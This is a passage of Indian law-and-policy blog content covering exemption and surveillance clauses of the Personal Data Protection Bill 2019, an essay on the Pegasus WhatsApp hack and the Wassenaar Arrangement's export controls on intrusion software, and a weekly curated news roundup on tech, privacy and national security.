The constitutionality of India’s surveillance apparatus, including section 69 of the IT Act – which allows for surveillance on the broader grounds of necessity and expediency rather than ‘public emergency’ and ‘public safety’ – has been challenged before the Supreme Court and is currently pending. Clause 35 of the Bill also mentions necessity and expediency as prerequisites for the government to exercise its power to grant exemptions; these terms appear vague and open-ended as they are not defined. The test of necessity implies resorting to the least intrusive method of encroachment upon privacy to achieve the legitimate state aim. This test is typically one among several factors applied in deciding whether a particular intrusion on a right is tenable under human rights law. In his concurring opinion in Puttaswamy (I), J. Kaul included ‘necessity’ in the proportionality test (however, this test is not otherwise well developed in Indian jurisprudence). Expediency, on the other hand, is not a specific legal basis used for determining the validity of an intrusion on human rights, and was not referred to in Puttaswamy (I) as a basis for assessing a privacy violation. The use of the term ‘expediency’ in the Bill is deeply worrying, as it seems to lower the threshold for allowing surveillance – a regressive step in the context of cases like PUCL and Puttaswamy (I). A valid law, along with the principles of proportionality and necessity, is essential to put in place an effective system of checks and balances on the executive’s power to grant exemptions. It seems unlikely that the clause will pass the test of proportionality (sanction of law, legitimate aim, proportionality to the need for interference, and procedural guarantees against abuse) laid down by the Supreme Court in Puttaswamy (I).

The Srikrishna Committee report had recommended that surveillance should not only be conducted under law (and not executive order), but should also be subject to oversight and transparency requirements. The Committee had argued that the tests of lawfulness, necessity and proportionality provided under clauses 42 and 43 (of the Draft Bill 2018) were sufficient to meet the standards set out in the Puttaswamy judgment. Since the PDP Bill does away with all of these safeguards and leaves the decision to executive discretion, the law is unconstitutional. After the Bill was introduced in the Lok Sabha, J. Srikrishna criticised it for granting expansive exemptions in the absence of judicial oversight. He warned that the consequences could be disastrous from the point of view of safeguarding the right to privacy, and could turn the country into an “Orwellian State”. He has also opined on the need for a separate legislation to govern the terms under which the government can resort to surveillance.

Clause 36 of the Bill exempts certain processing of personal data from some provisions of the Bill. It combines four different clauses on exemption which were listed in the Draft Bill 2018 (clauses 43, 44, 46 and 47). These cover the processing of personal data in the interests of the prevention, detection, investigation and prosecution of contraventions of law; for the purpose of legal proceedings; for personal or domestic purposes; and for journalistic purposes. The Draft Bill 2018 had detailed provisions requiring a law passed by Parliament or a State Legislature, which is necessary and proportionate, for processing personal data in the interests of prevention, detection, investigation and prosecution of contraventions of law. Clause 36 of the Bill does not include the requirement of such a law. We had argued that the exemptions granted by the Draft Bill 2018 (clauses 43, 44, 46 and 47) were wide, vague and in need of clarification, but the exemptions under clause 36 of the Bill are even more ambiguous, as they merely list the exemptions without any specificities or procedural safeguards in place.

In the Draft Bill 2018, the Authority could not grant exemptions from the obligations of fair and reasonable processing, security safeguards and data protection impact assessments for research, archiving or statistical purposes. Under the current Bill, the Authority can exempt processing for research, archiving or statistical purposes from any of the provisions of the Act.

The last addition to this chapter of exemptions is the creation of a sandbox for encouraging innovation. The newly added clause 40 is aimed at fostering innovation in artificial intelligence, machine learning or any other emerging technology, in the public interest. What the sandbox entails, beyond exemption from some of the obligations under Chapter II, needs further clarity. Additionally, to be considered an eligible applicant, a data fiduciary must obtain certification of its privacy-by-design policy from the DPA, as mentioned in clause 40(4) read with clause 22.

Though well appreciated for its intent, this provision requires clarification on the grounds for selection and the details of how the sandbox will operate.


[1] At the time of introduction of the PDP Bill 2019, the Minister for Law and Justice, Mr. Ravi Shankar Prasad, suggested that over 2,000 inputs were received on the Draft Bill 2018, based on which changes were made in the PDP Bill 2019. However, MeitY has not published these comments and inputs; only a handful have been made public, by the stakeholders who submitted them.

The Pegasus Hack: A Hark Back to the Wassenaar Arrangement

By Sharngan Aravindakshan

The world’s most popular messaging application, Whatsapp, recently revealed that a significant number of Indians were among the targets of Pegasus, a sophisticated spyware that operates by exploiting a vulnerability in Whatsapp’s video-calling feature. It has also come to light that Whatsapp, working with the University of Toronto’s Citizen Lab, an academic research organization with a focus on digital threats to civil society, has traced the source of the spyware to NSO Group, an Israeli company well known both for developing and selling hacking and surveillance technology to governments with a questionable record in human rights. Whatsapp’s lawsuit against NSO Group in a federal court in California also specifically alludes to NSO Group’s clients “which include but are not limited to government agencies in the Kingdom of Bahrain, the United Arab Emirates, and Mexico as well as private entities.” The complaint filed by Whatsapp against NSO Group can be accessed here.

In this context, we examine the shortcomings of international efforts to limit or regulate the transfer or sale of advanced and sophisticated technology to governments that often use it to violate human rights, and highlight the complex and blurred lines between the military and civil uses of these technologies by governments.

The Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies (WA) exists for this precise reason. Established in 1996 and voluntary/non-binding in nature,[i] its stated mission is “to contribute to regional and international security and stability, by promoting transparency and greater responsibility in transfers of conventional arms and dual-use goods and technologies, thus preventing destabilizing accumulations.”[ii] Military advancements across the globe – significant among which were the Indian and Pakistani nuclear tests, rocket tests by India and South Korea, and the use of chemical warfare during the Iran-Iraq war – were all catalysts in the formulation of this multilateral attempt to regulate the transfer of advanced technologies capable of being weaponized.[iii] With more and more incidents coming to light of authoritarian regimes utilizing advanced western technology to violate human rights, the WA was amended to bring within its ambit “intrusion software” and “IP network surveillance systems” as well. 

Wassenaar: A General Outline

With a current membership of 42 countries (India being the latest to join, in late 2017), the WA is the successor to the Cold War-era Coordinating Committee for Multilateral Export Controls (COCOM), which had been established by the Western Bloc to prevent weapons and technology exports to the Soviet-led Eastern Bloc.[iv] However, unlike its predecessor, the WA does not target any nation-state, and its members cannot exercise any veto power over other members’ export decisions.[v] Notably, while Russia is a member, Israel and China are not.

The WA lists the different technologies in the form of “Control Lists”, primarily consisting of the “List of Dual-Use Goods and Technologies” (the Basic List) and the “Munitions List”.[vi] The term “dual-use technology” typically refers to technology that can be used for both civilian and military purposes.[vii] The Basic List consists of the following categories:[viii]

  • Special Materials and Related Equipment (Category 1); 
  • Materials Processing (Category 2); 
  • Electronics (Category 3); 
  • Computers (Category 4); 
  • Telecommunications (Category 5, Part 1); 
  • Information Security (Category 5, Part 2); 
  • Sensors and Lasers (Category 6); 
  • Navigation and Avionics (Category 7); 
  • Marine (Category 8); 
  • Aerospace and Propulsion (Category 9). 

The Basic List also has the Sensitive and Very Sensitive Lists, which include technologies covering radiation, submarine technology, advanced radar, etc. 

An outline of the WA’s principles is provided in its Guidelines & Procedures, including the Initial Elements. Typically, participating countries enforce controls on transfer of the listed items by enacting domestic legislation requiring licenses for export of these items and are also expected to ensure that the exports “do not contribute to the development or enhancement of military capabilities which undermine these goals, and are not diverted to support such capabilities.[ix]

While the Guidelines & Procedures document does not expressly proscribe the export of the specified items to non-WA countries, members are expected to notify other participants twice a year if a license under the Dual-Use List is denied for export to any non-WA country.[x]

Amid concerns of violation of civil liberties

Unlike conventional weapons, cyberspace and information technology are sectors in which governments do not yet have a monopoly on expertise. In what can only be termed a “cyber-arms race”, it would be fair to say that most governments are even now busily acquiring technology from private companies to enhance their cyber-capacity, including surveillance technology for intelligence-gathering efforts. This, by itself, is plain realpolitik.

However, amid this weaponization of cyberspace, there were growing concerns that such technology was being purchased by authoritarian or repressive governments for use against their own citizens. For instance, Eagle, monitoring technology owned by Amesys (a unit of the French firm Bull SA), internet-filtering technology from Boeing Co.’s Narus, and equipment from China’s ZTE Corp. all contributed to the surveillance efforts of Col. Gaddafi’s regime in Libya. Surveillance equipment sold by Siemens AG and maintained by Nokia Siemens Networks was used against human rights activists in Bahrain. These instances, as part of a wider pattern that came to the spotlight, galvanized the WA countries in 2013 to include “intrusion software” and “IP network surveillance systems” in the Control Lists, in an attempt to limit the transfer of these technologies to known repressive regimes. 

Unexpected Consequences

The 2013 Amendment to the Control Lists was the subject of severe criticism by tech companies and civil society groups across the board. While the intention behind it was recognized as laudable, the terms “intrusion software” and “IP network surveillance system” were widely viewed as over-broad, with the unintended consequence of looping in legitimate as well as illegitimate uses of technology. The problems pointed out by cybersecurity experts are manifold and stem from a misunderstanding of how cybersecurity works.

The inclusion of these terms, which was meant to regulate surveillance based on computer code/programmes, also has the consequence of bringing within its ambit legitimate and often beneficial uses of these technologies – according to one view, even antivirus technology. Cybersecurity research and development often involves making use of “zero-day exploits”, i.e. vulnerabilities in released software which, when discovered and reported by a “bounty hunter”, are typically bought by the company owning the software. This helps the company immediately develop a “patch” for the reported vulnerability. These transactions are often necessarily cross-border. Experts complained that, if directly transposed into domestic law, the changes would have a chilling effect on this vital exchange of information and research – a major hurdle for advances in cybersecurity, making cyberspace globally less safe. A prime example is Hewlett-Packard’s (HP) withdrawal from Pwn2Own – a computer hacking contest held at the PacSec security conference, where contestants are challenged to hack into/exploit vulnerabilities in widely used software. HP, which sponsored the event, was forced to withdraw in 2015 citing, among other reasons, the “complexity in obtaining real-time import/export licenses in countries that participate in the Wassenaar Arrangement”. The member nation in this case was Japan.

After facing fierce opposition at home, the United States decided not to implement the WA amendment and instead argued for a reversal at the next Plenary session of the WA, which failed. Other jurisdictions, including the EU and Japan, have implemented the WA amendment’s export controls with varying degrees of success.

The Pegasus Hack, India and the Wassenaar

Considering that many of the Indians identified as victims of the Pegasus hack were journalists or human rights activists, many of them associated with the highly contentious Bhima-Koregaon case, speculation is rife that the Indian government is among those purchasing and utilizing this kind of advanced surveillance technology to spy on its own citizens. Adding to this the NSO Group’s public statement that its “sole purpose” is to “provide technology to licensed government intelligence and law enforcement agencies to help them fight terrorism and serious crime”, there appear to be credible allegations that the Indian government was involved in the hack. The government’s evasiveness in responding, and its insistence that so-called “standard operating procedures” were followed, are less than reassuring.

While India’s entry to the WA as its 42nd member in 2018 has certainly elevated its status in the international arms control regime by granting it access to three of the world’s four main arms-control regimes (the others being the Nuclear Suppliers’ Group / NSG, the Missile Technology Control Group / MTCR and the Australia Group), the Pegasus Hack incident and the apparent connection to the Indian government shows us that its commitment to the principles underlying the WA is doubtful. The purpose of the inclusion of “intrusion software” and “IP network surveillance system” in the WA’s Control Lists by way of the 2013 Amendment, no matter their unintended consequences for legitimate uses of such technology, was to prevent governmental purchases exactly like this one. Hence, even though the WA does not prohibit the purchase of any surveillance technology from a non-member, the Pegasus incident arguably, is still a serious detraction from India’s commitment to the WA, even if not an explicit violation.

Military Cyber-Capability Vs Law Enforcement Cyber-Capability

Given what we know so far, it appears that highly sophisticated surveillance technology has also come into the hands of local law enforcement agencies. Had it been disclosed that the Pegasus software was being utilized by a military wing against external enemies – say, by the newly created Defence Cyber Agency – it would probably have caused fewer ripples. In fact, it might even have come off as reassuring evidence of the country’s advanced cyber-capabilities. However, the idea of such advanced, sophisticated technology at the easy disposal of local law enforcement agencies is cause for worry. This is because, while the traditional domain of the military is external, the domain of law enforcement agencies is internal, i.e., the citizenry. There is tremendous scope for misuse by such authorities, including increased targeting of minorities. The recent incident of police officials in Hyderabad randomly collecting people’s biometric data, including fingerprints and photographs, only underscores this point. Even abroad, there are already ongoing efforts to limit the use of surveillance technologies by local law enforcement such as the police.

The conflation of technology use by military and civil agencies is a problem created, in part at least, by the complex and often dual-use nature of technology. While dual-use technology is recognized by the WA, this is not a problem the WA is able to solve. As explained above, dual-use technology is technology that can be used for both civil and military purposes. The demands of realpolitik, the rise in cyber-terrorism, and the manifold ways in which a nation’s security can be compromised in cyberspace compel any government in today’s world to increase and improve its military cyber-capacity by acquiring such technology. After all, a government that acquires surveillance technology undoubtedly increases the effectiveness of its intelligence gathering and, ergo, its security efforts. But at the same time, the government also acquires the power to spy on its own citizens, which can easily cascade into more targeted violations. 

Governments must resist the impulse to turn such technology on their own citizens. In the Indian scenario, citizens have been granted a ring of protection by way of the Puttaswamy judgment, which explicitly recognizes the right to privacy as a fundamental right. Interception and surveillance by the government, while currently limited by laid-down protocols, are not regulated by any dedicated law. While there are calls for urgent legislation on the subject, few deal with the technology procurement processes involved. It has also now emerged that Chhattisgarh’s State Government has set up a panel to look into allegations that NSO officials met with the state police a few years ago. This raises questions about oversight of the relevant authorities’ public procurement processes, apart from their legal authority to actually carry out domestic surveillance by exploiting zero-day vulnerabilities. It is becoming evident that any law dealing with surveillance will need to ensure transparency and accountability in the procurement and use of the different kinds of invasive technology adopted by Central or State authorities to carry out such surveillance. 


[i] A Guide to the Wassenaar Arrangement, Daryl Kimball, Arms Control Association, December 9, 2013, https://www.armscontrol.org/factsheets/wassenaar, last accessed on November 27, 2019.

[ii] Ibid.

[iii] Data, Interrupted: Regulating Digital Surveillance Exports, Tim Maurer and Jonathan Diamond, November 24, 2015, World Politics Review.

[iv] Wassenaar Arrangement: The Case of India’s Membership, Rajeswari P. Rajagopalan and Arka Biswas, ORF Occasional Paper #92, p. 3, Observer Research Foundation, May 5, 2016, http://www.orfonline.org/wp-content/uploads/2016/05/ORF-Occasional-Paper_92.pdf, last accessed on November 27, 2019.

[v] Ibid., p. 3.

[vi] “List of Dual-Use Goods and Technologies And Munitions List,” The Wassenaar Arrangement, available at https://www.wassenaar.org/public-documents/, last accessed on November 27, 2019. 

[vii] Article 2(1), Proposal for a Regulation of the European Parliament and of the Council setting up a Union regime for the control of exports, transfer, brokering, technical assistance and transit of dual-use items (recast), European Commission, September 28, 2016, http://trade.ec.europa.eu/doclib/docs/2016/september/tradoc_154976.pdf, last accessed on November 27, 2019. 

[viii] Supra note vi.

[ix] Guidelines & Procedures, including the Initial Elements, The Wassenaar Arrangement, December 2016, http://www.wassenaar.org/wp-content/uploads/2016/12/Guidelines-and-procedures-including-the-Initial-Elements-2016.pdf, last accessed on November 27, 2019.

[x] Articles V(1) & (2), Guidelines & Procedures, including the Initial Elements, The Wassenaar Arrangement, December 2016, https://www.wassenaar.org/public-documents/, last accessed on November 27, 2019.

[September 30-October 7] CCG’s Week in Review: Curated News in Information Law and Policy

Huawei finds support from Indian telcos in the 5G rollout; PayPal withdraws from Facebook’s Libra cryptocurrency project; Foreign Portfolio Investors move MeitY seeking exemptions from the Data Protection Bill; the CJEU rules against Facebook in a case relating to the global takedown of content; and Karnataka joins the list of states considering implementing the NRC to remove illegal immigrants – presenting this week’s most important developments in law, tech and national security.

Digital India

  • [Sep 30] Why the imminent global economic slowdown is a growth opportunity for Indian IT services firms, Tech Circle report.
  • [Sep 30] Norms tightened for IT items procurement for schools, The Hindu report.
  • [Oct 1] Govt runs full throttle towards AI, but tech giants want to upskill bureaucrats first, Analytics India Magazine report.
  • [Oct 3] MeitY launches smart-board for effective monitoring of key programmes, The Economic Times report.
  • [Oct 3] “Use human not artificial intelligence…” to keep a tab on illegal constructions: Court to Mumbai civic body, NDTV report.
  • [Oct 3] India took 3 big productivity leaps: Nilekani, Livemint report.
  • [Oct 4] MeitY to push for more sops to lure electronic makers, The Economic Times report; Inc42 report.
  • [Oct 4] Core philosophy of Digital India embedded in Gandhian values: Ravi Shankar Prasad, Financial Express report.
  • [Oct 4] How can India leverage its data footprint? Experts weigh in at the India Economic Summit, Quartz report.
  • [Oct 4] Indians think jobs would be easy to find despite automation: WEF, Tech Circle report.
  • [Oct 4] Telangana govt adopts new framework to use drones for last-mile delivery, The Economic Times report.
  • [Oct 5] Want to see ‘Assembled in India’ on an iPhone: Ravi Shankar Prasad, The Economic Times report.
  • [Oct 6] Home market gets attractive for India’s IT giants, The Economic Times report.

Internet Governance

  • [Oct 2] India Govt requests maximum social media content takedowns in the world, Inc42 report; Tech Circle report.
  • [Oct 3] Facebook can be forced to delete defamatory content worldwide, top EU court rules, Politico EU report.
  • [Oct 4] EU ruling may spell trouble for Facebook in India, The Economic Times report.
  • [Oct 4] TikTok, TikTok… the clock is ticking on the question whether ByteDance pays its content creators, ET Tech report.
  • [Oct 6] Why data localization triggers a heated debate, The Economic Times report.
  • [Oct 7] Sensitive Indian govt data must be stored locally, Outlook report.

Data Protection and Privacy

  • [Sep 30] FPIs move MeitY against data bill, seek exemption, ET Markets report; Inc42 report; Financial Express report.
  • [Oct 1] United States: CCPA exception approved by California legislature, Mondaq.com report.
  • [Oct 1] Privacy is gone, what we need is regulation, says Infosys’ Kris Gopalakrishnan, News18 report.
  • [Oct 1] Europe’s top court says active consent is needed for tracking cookies, Tech Crunch report.
  • [Oct 3] Turkey fines Facebook $282,000 over data privacy breach, Deccan Herald report.

Free Speech

  • [Oct 1] Singapore’s ‘fake news’ law to come into force Wednesday, but rights group worry it could stifle free speech, The Japan Times report.
  • [Oct 2] Minister says Singapore’s fake news law is about ‘enabling’ free speech, CNBC report.
  • [Oct 3] Hong Kong protests: Authorities to announce face mask ban, BBC News report.
  • [Oct 3] ECHR: Holocaust denial is not protected free speech, ASIL brief.
  • [Oct 4] FIR against Mani Ratnam, Adoor and 47 others who wrote to Modi on communal violence, The News Minute report; Times Now report.
  • [Oct 5] UN asks Malaysia to repeal laws curbing freedom of speech, The New Indian Express report.
  • [Oct 6] When will our varsities get freedom of expression: PC, Deccan Herald report.
  • [Oct 6] UK Government to make university students sign contracts limiting speech and behavior, The Times report.
  • [Oct 7] FIR on Adoor and others condemned, The Telegraph report.

Aadhaar, Digital IDs

  • [Sep 30] Plea in SC seeking linking of social media accounts with Aadhaar to check fake news, The Economic Times report.
  • [Oct 1] Why another omnibus national ID card?, The Hindu Business Line report.
  • [Oct 2] ‘Kenyan court process better than SC’s approach to Aadhaar challenge’: V Anand, who testified against biometric project, LiveLaw report.
  • [Oct 3] Why Aadhaar is a stumbling block in Modi govt’s flagship maternity scheme, The Print report.
  • [Oct 4] Parliament panel to review Aadhaar authority functioning, data security, NDTV report.
  • [Oct 5] Could Aadhaar linking stop GST frauds?, Financial Express report.
  • [Oct 6] Call for liquor sale-Aadhaar linking, The New Indian Express report.

Digital Payments, Fintech

  • [Oct 7] Vision cash-lite: A billion UPI transactions is not enough, Financial Express report.

Cryptocurrencies

  • [Oct 1] US SEC fines crypto company Block.one for unregistered ICO, Medianama report.
  • [Oct 1] South Korean Court issues landmark decision on crypto exchange hacking, Coin Desk report.
  • [Oct 2] The world’s most used cryptocurrency isn’t bitcoin, ET Markets report.
  • [Oct 2] Offline transactions: the final frontier for global crypto adoption, Coin Telegraph report.
  • [Oct 3] Betting on bitcoin prices may soon be deemed illegal gambling, The Economist report.
  • [Oct 3] Japan’s financial regulator issues draft guidelines for funds investing in crypto, Coin Desk report.
  • [Oct 3] Hackers launch widespread botnet attack on crypto wallets using cheap Russian malware, Coin Desk report.
  • [Oct 4] State-backed crypto exchange in Venezuela launches new crypto debit cards, Decrypt report.
  • [Oct 4] PayPal withdraws from Facebook-led Libra crypto project, Coin Desk report.
  • [Oct 5] Russia regulates digital rights, advances other crypto-related bills, Bitcoin.com report.
  • [Oct 5] Hong Kong regulates crypto funds, Decrypt report.

Cybersecurity and Cybercrime

  • [Sep 30] Legit-looking iPhone lightning cables that hack you will be mass produced and sold, Vice report.
  • [Sep 30] Blackberry launches new cybersecurity development labs, Infosecurity Magazine report.
  • [Oct 1] Cybersecurity experts warn that these 7 emerging technologies will make it easier for hackers to do their jobs, Business Insider report.
  • [Oct 1] US government confirms new aircraft cybersecurity move amid terrorism fears, Forbes report.
  • [Oct 2] ASEAN unites to fight back on cyber crime, GovInsider report; Asia One report.
  • [Oct 2] Adopting AI: the new cybersecurity playbook, TechRadar Pro report.
  • [Oct 4] US-UK Data Access Agreement, signed on Oct 3, is an executive agreement under the CLOUD Act, Medianama report.
  • [Oct 4] The lack of cybersecurity talent is ‘a national security threat,’ says DHS official, Tech Crunch report.
  • [Oct 4] Millions of Android phones are vulnerable to Israeli surveillance dealer attack, Forbes report; NDTV report.
  • [Oct 4] IoT devices, cloud solutions soft target for cybercriminals: Symantec, Tech Circle report.
  • [Oct 6] 7 cybersecurity threats that can sneak up on you, Wired report.
  • [Oct 6] No one could prevent another ‘WannaCry-style’ attack, says DHS official, Tech Crunch report.
  • [Oct 7] Indian firms rely more on automation for cybersecurity: Report, ET Tech report.

Cyberwarfare

  • [Oct 2] New ASEAN committee to implement norms for countries’ behaviour in cyberspace, CNA report.

Tech and National Security

  • [Sep 30] IAF ready for Balakot-type strike, says new chief Bhadauria, The Hindu report; Times of India report.
  • [Sep 30] Naval variant of LCA Tejas achieves another milestone during its test flight, Livemint report.
  • [Sep 30] SAAB wants to offer Gripen at half of Rafale cost, full tech transfer, The Print report.
  • [Sep 30] Rajnath harps on ‘second strike capability’, The Shillong Times report.
  • [Oct 1] EAM Jaishankar defends India’s S-400 missile system purchase from Russia amid US sanctions threat, International Business Times report.
  • [Oct 1] SC for balance between liberty, national security, Hindustan Times report.
  • [Oct 2] Startups have it easy for defence deals up to Rs. 150 cr, ET Rise report; Swarajya Magazine report.
  • [Oct 3] Huawei-wary US puts more pressure on India, offers alternatives to data localization, The Economic Times report.
  • [Oct 4] India-Russia missile deal: What is CAATSA law and its implications?, Jagran Josh report.
  • [Oct 4] Army inducts Israeli ‘tank killers’ till DRDO develops new ones, Defence Aviation Post report.
  • [Oct 4] China, Russia deepen technological ties, Defense One report.
  • [Oct 4] Will not be afraid of taking decisions for fear of attracting corruption complaints: Rajnath Singh, New Indian Express report.
  • [Oct 4] At conclave with naval chiefs of 10 countries, NSA Ajit Doval floats an idea, Hindustan Times report.
  • [Oct 6] Pathankot airbase to finally get enhanced security, The Economic Times report.
  • [Oct 6] Rafale with Meteor and Scalp missiles will give India unrivalled combat capability: MBDA, The Economic Times report.
  • [Oct 7] India, Bangladesh sign MoU for setting up a coastal surveillance radar in Bangladesh, The Economic Times report; Deccan Herald report.
  • [Oct 7] Indian operated T-90 tanks to become Russian army’s main battle tank, EurAsian Times report.
  • [Oct 7] IAF’s Sukhois to get more advanced avionics, radar, Defence Aviation Post report.

Tech and Law Enforcement

  • [Sep 30] TMC MP Mahua Moitra wants to be impleaded in the WhatsApp traceability case, Medianama report; The Economic Times report.
  • [Oct 1] Role of GIS and emerging technologies in crime detection and prevention, Geospatial World.net report.
  • [Oct 2] TRAI to take more time on OTT norms; lawful interception, security issue now in focus, The Economic Times report.
  • [Oct 2] China invents super surveillance camera that can spot someone from a crowd of thousands, The Independent report.
  • [Oct 4] ‘Don’t introduce end-to-end encryption,’ UK, US and Australia ask Facebook in an open letter, Medianama report.
  • [Oct 4] Battling new-age cyber threats: Kerala Police leads the way, The Week report.
  • [Oct 7] India govt’s bid for WhatsApp decryption gets push as UK, US, Australia rally support, Entrackr report.

Tech and Elections

  • [Oct 1] WhatsApp was extensively exploited during 2019 elections in India: Report, Firstpost report.
  • [Oct 3] A national security problem without a parallel in American democracy, Defense One report.

Internal Security: J&K

  • [Sep 30] BDC polls across Jammu, Kashmir, Ladakh on Oct 24, The Economic Times report.
  • [Sep 30] India ‘invaded and occupied’ Kashmir, says Malaysian PM at UN General Assembly, The Hindu report.
  • [Sep 30] J&K police stations to have CCTV camera surveillance, News18 report.
  • [Oct 1] 5-judge Supreme Court bench to hear multiple pleas on Article 370, Kashmir lockdown today, India Today report.
  • [Oct 1] India’s stand clear on Kashmir: won’t accept third-party mediation, India Today report.
  • [Oct 1] J&K directs officials to ensure all schools reopen by Thursday, NDTV report.
  • [Oct 2] ‘Depressed, frightened’: Minors held in Kashmir crackdown, Al Jazeera report.
  • [Oct 3] J&K: When the counting of the dead came to a halt, The Hindu report.
  • [Oct 3] High schools open in Kashmir, students missing, The Economic Times report.
  • [Oct 3] Jaishankar reiterates India’s claim over Pakistan-occupied Kashmir, The Hindu report.
  • [Oct 3] Normalcy prevails in Jammu and Kashmir, DD News report.
  • [Oct 3] Kashmiri leaders will be released one by one, India Today report.
  • [Oct 4] India slams Turkey, Malaysia remarks on J&K, The Hindu report.
  • [Oct 5] India’s clampdown hits Kashmir’s Silicon Valley, The Economic Times report.
  • [Oct 5] Traffic cop among 14 injured in grenade attack in South Kashmir, NDTV report; The Economic Times report.
  • [Oct 6] Kashmir situation normal, people happy with Article 370 abrogation: Prakash Javadekar, Times of India report.
  • [Oct 7] Kashmir residents say police forcibly taking over their homes for CRPF troops, Huffpost India report.

Internal Security: Northeast/ NRC

  • [Sep 30] Giving total control of Assam Rifles to MHA will adversely impact vigil: Army to Govt, The Economic Times report.
  • [Sep 30] NRC list impact: Assam’s foreigner tribunals to have 1,600 on contract, The Economic Times report.
  • [Sep 30] Assam NRC: Case against Wipro for rule violation, The Hindu report; News18 report; Scroll.in report.
  • [Sep 30] Hindu outfits demand NRC in Karnataka, Deccan Chronicle report; The Hindustan Times report.
  • [Oct 1] Centre extends AFSPA in three districts of Arunachal Pradesh for six months, ANI News report.
  • [Oct 1] Assam’s NRC: law schools launch legal aid clinic for excluded people, The Hindu report; Times of India report; The Wire report.
  • [Oct 1] Amit Shah in Kolkata: NRC to be implemented in West Bengal, infiltrators will be evicted, The Economic Times report.
  • [Oct 1] US Congress panel to focus on Kashmir, Assam, NRC in hearing on human rights in South Asia, News18 report.
  • [Oct 1] NRC must for national security; will be implemented: Amit Shah, The Hindu Business Line report.
  • [Oct 2] Bengali Hindu women not on NRC pin their hope on promise of another list, citizenship bill, The Print report.
  • [Oct 3] Citizenship Amendment Bill has become necessity for those left out of NRC: Assam BJP president Ranjeet Das, The Economic Times report.
  • [Oct 3] BJP govt in Karnataka mulling NRC to identify illegal migrants, The Economic Times report.
  • [Oct 3] Explained: Why Amit Shah wants to amend the Citizenship Act before undertaking countrywide NRC, The Indian Express report.
  • [Oct 4] Duplicating NPR, NRC to sharpen polarization: CPM, Deccan Herald report.
  • [Oct 5] We were told NRC India’s internal issue: Bangladesh, Livemint report.
  • [Oct 6] Prasanna calls NRC ‘unjust law’, The New Indian Express report.

National Security Institutions

  • [Sep 30] CRPF ‘denied’ ration cash: Govt must stop ‘second-class’ treatment, The Quint report.
  • [Oct 1] Army calls out ‘prejudiced’ foreign report on ‘torture’, refutes claim, Republic World report.
  • [Oct 2] India has no extraterritorial ambition, will fulfill regional and global security obligations: Bipin Rawat, The Economic Times report.

More on Huawei, 5G

  • [Sep 30] Norway open to Huawei supplying 5G equipment, Forbes report.
  • [Sep 30] Airtel deploys 100 hops of Huawei’s 5G technology, The Economic Times report.
  • [Oct 1] America’s answer to Huawei, Foreign Policy report; Tech Circle report.
  • [Oct 1] Huawei buys access to UK innovation with Oxford stake, Financial Times report.
  • [Oct 3] India to take bilateral approach on issues faced by other countries with China: Jaishankar, The Hindu report.
  • [Oct 4] Bharti Chairman Sunil Mittal says India should allow Huawei in 5G, The Economic Times report.
  • [Oct 6] 5G rollout: Huawei finds support from telecom industry, Financial Express report.

Emerging Tech: AI, Facial Recognition

  • [Sep 30] Bengaluru set to roll out AI-based traffic solution at all signals, Entrackr report.
  • [Oct 1] AI is being used to diagnose disease and design new drugs, Forbes report.
  • [Oct 1] Only 10 jobs created for every 100 jobs taken away by AI, The Economic Times report.
  • [Oct 2] Emerging tech is helping companies grow revenues 2x: report, ET Tech report.
  • [Oct 2] Google using dubious tactics to target people with ‘darker skin’ in facial recognition project: sources, Daily News report.
  • [Oct 2] Three problems posed by deepfakes that technology won’t solve, MIT Technology Review report.
  • [Oct 3] Getting a new mobile number in China will involve a facial recognition test, Quartz report.
  • [Oct 4] Google contractors targeting homeless people, college students to collect their facial recognition data: Report, Medianama report.
  • [Oct 4] More jobs will be created than are lost from the AI revolution: WEF AI Head, Livemint report.
  • [Oct 6] IIT-Guwahati develops AI-based tool for electric vehicle motor, Livemint report.
  • [Oct 7] Even if China misuses AI tech, Satya Nadella thinks blocking China’s AI research is a bad idea, India Times report.

Big Tech

  • [Oct 3] Dial P for privacy: Google has three new features for users, Times of India report.

Opinions and Analyses

  • [Sep 26] Richard Stengel, Time, We’re in the middle of a global disinformation war. Here’s what we need to do to win.
  • [Sep 29] Ilker Koksal, Forbes, The shift toward decentralized finance: Why are financial firms turning to crypto?
  • [Sep 30] Nistula Hebbar, The Hindu, Govt. views grassroots development in Kashmir as biggest hope for peace.
  • [Sep 30] Simone McCarthy, South China Morning Post, Could China’s strict cyber controls gain international acceptance?
  • [Sep 30] Nele Achten, Lawfare blog, New UN Debate on cybersecurity in the context of international security.
  • [Sep 30] Dexter Fergie, Defense One, How ‘national security’ took over America.
  • [Sep 30] Bonnie Girard, The Diplomat, A firsthand account of Huawei’s PR drive.
  • [Oct 1] The Economic Times, Rafale: Past tense but future perfect.
  • [Oct 1] Simon Chandler, Forbes, AI has become a tool for classifying and ranking people.
  • [Oct 2] Ajay Batra, Business World, Rethink India! – MMRCA, ESDM & Data Privacy Policy.
  • [Oct 2] Carisa Nietsche, National Interest, Why Europe won’t combat Huawei’s Trojan tech.
  • [Oct 3] Aruna Sharma, Financial Express, The digital way: growth with welfare.
  • [Oct 3] Alok Prasanna Kumar, Medianama, When it comes to Netflix, the Government of India has no chill.
  • [Oct 3] Fredrik Bussler, Forbes, Why we need crypto for good.
  • [Oct 3] Panos Mourdoukoutas, Forbes, India changed the game in Kashmir – Now what?
  • [Oct 3] Grant Wyeth, The Diplomat, The NRC and India’s unfinished partition.
  • [Oct 3] Zak Doffman, Forbes, Is Huawei’s worst Google nightmare coming true?
  • [Oct 4] Oren Yunger, Tech Crunch, Cybersecurity is a bubble, but it’s not ready to burst.
  • [Oct 4] Minakshi Buragohain, Indian Express, NRC: Supporters and opponents must engage each other with empathy.
  • [Oct 4] Frank Ready, Law.com, 27 countries agreed on ‘acceptable’ cyberspace behavior. Now comes the hard part.
  • [Oct 4] Samir Saran, World Economic Forum (blog), 3 reasons why data is not the new oil and why this matters to India.
  • [Oct 4] Andrew Marantz, The New York Times, Free Speech is killing us.
  • [Oct 4] Financial Times editorial, ECJ ruling poses risks for freedom of speech online.
  • [Oct 4] George Kamis, GCN, Digital transformation requires a modern approach to cybersecurity.
  • [Oct 4] Naomi Xu Elegant and Grady McGregor, Fortune, Hong Kong’s mask ban pits anonymity against the surveillance state.
  • [Oct 4] Prashanth Parameswaran, The Diplomat, What’s behind the new US-ASEAN cyber dialogue?
  • [Oct 5] Huong Le Thu, The Strategist, Cybersecurity and geopolitics: why Southeast Asia is wary of a Huawei ban.
  • [Oct 5] Hannah Devlin, The Guardian, We are hurtling towards a surveillance state: the rise of facial recognition technology.
